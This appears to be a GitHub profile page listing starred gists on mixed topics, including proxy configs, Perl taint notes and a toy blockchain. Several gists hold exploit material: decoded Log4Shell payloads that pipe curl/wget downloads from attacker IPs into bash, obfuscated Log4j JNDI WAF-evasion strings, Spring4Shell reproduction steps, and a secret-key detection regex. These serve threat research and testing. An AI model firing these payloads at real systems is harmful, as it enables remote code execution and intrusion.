Skip to content

Instantly share code, notes, and snippets.

View cwyalpha's full-sized avatar

cwyalpha cwyalpha

19 followers · 83 following
  • Shanghai Jiao Tong University
  • Shanghai
View GitHub Profile
@scraperdragon
scraperdragon / chrome2requests.py
Created August 22, 2012 11:25
Convert Chrome headers to Python's Requests dictionary
dict([[h.partition(':')[0], h.partition(':')[2]] for h in rawheaders.split('\n')])
@kentfredric
kentfredric / 00_TLDR.mkdn
Last active February 23, 2020 05:10
  1. CGI.pm is shit
  2. CGI is shit
  3. <"ARGV"> shouldn't work under use strict because thats a string dereferencing a symbolic ref.
  4. Hash Keys can't retain tainting and so can be used to propagate un-vetted data into safe spaces:
  my $hash = unsafe_thing_that_returns_a_hash();
  $dbh->query(join keys %{$hash}); # data will be untained regardless of what it is.
  1. CGI.pm should probably do something smarter than simply returning the first param when >1 params
@VincentSit
VincentSit / update_gfwlist.sh
Last active October 14, 2024 09:52
Automatically update the PAC for ShadowsocksX. Only tested on OS X. (Deprecated)
#!/bin/bash
# update_gfwlist.sh
# Author : VincentSit
# Copyright (c) http://xuexuefeng.com
#
# Example usage
#
# ./whatever-you-name-this.sh
#
# Task Scheduling (Optional)
@aunyks
aunyks / snakecoin.py
Last active April 29, 2024 22:52
import hashlib as hasher
import datetime as date
# Define what a Snakecoin block is
class Block:
def __init__(self, index, timestamp, data, previous_hash):
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
@MuxinLee
MuxinLee / ShadowPro.conf
Last active June 18, 2024 14:12
Shadowrocket 🚀小火箭配置文件更新
[General]
# ShadowRocket 现已支持 DoH / DoT
# 您可以根据需求自行决定选用 DNS 服务器的种类和组合方式,例如:混用服务器来实现最佳解析速度;单独 DoH 使用来达到最佳安全性和最低污染度。
dns-server = https://doh.pub/dns-query, https://dns.alidns.com/dns-query
bypass-tun = 10.0.0.0/8, 100.64.0.0/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 192.88.99.0/24, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 255.255.255.255/32, 0.0.0.0/31, ::ffff:0.0.0.0/31
skip-proxy = localhost, *.local, injections.adguard.org, local.adguard.org, captive.apple.com, guzzoni.apple.com, 0.0.0.0/8, 10.0.0.0/8, 17.0.0.0/8, 100.64.0.0/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 192.88.99.0/24, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 240.0.0.0/4, 255.255.255.255/32
bypass-system = true
ipv6 = true
update-url = https://git.io/JfV0x
[Rule]
@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@ZephrFish
ZephrFish / Log4j Payloads
Last active December 20, 2022 19:32
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@esell
esell / stuff.txt
Last active April 12, 2022 15:55
At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC
- clone https://spring.io/guides/gs/handling-form-submission/
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
- install tomcat9 + java 11 (i did it on ubuntu 20.04)
- deploy the war file
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
@h4x0r-dz
h4x0r-dz / Generic keys
Created May 5, 2022 09:15
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@hwchase17
hwchase17 / claude-ai-plugins.py
Created March 27, 2023 01:56
from langchain.llms import Anthropic
from langchain.agents import load_tools, initialize_agent
from langchain.tools import AIPluginTool
PREFIX = """\n\nHuman: Answer the following questions as best you can. You have access to the following tools:"""
SUFFIX = """Begin!
Question: {input}
\n\nAssistant:
Thought:{agent_scratchpad}"""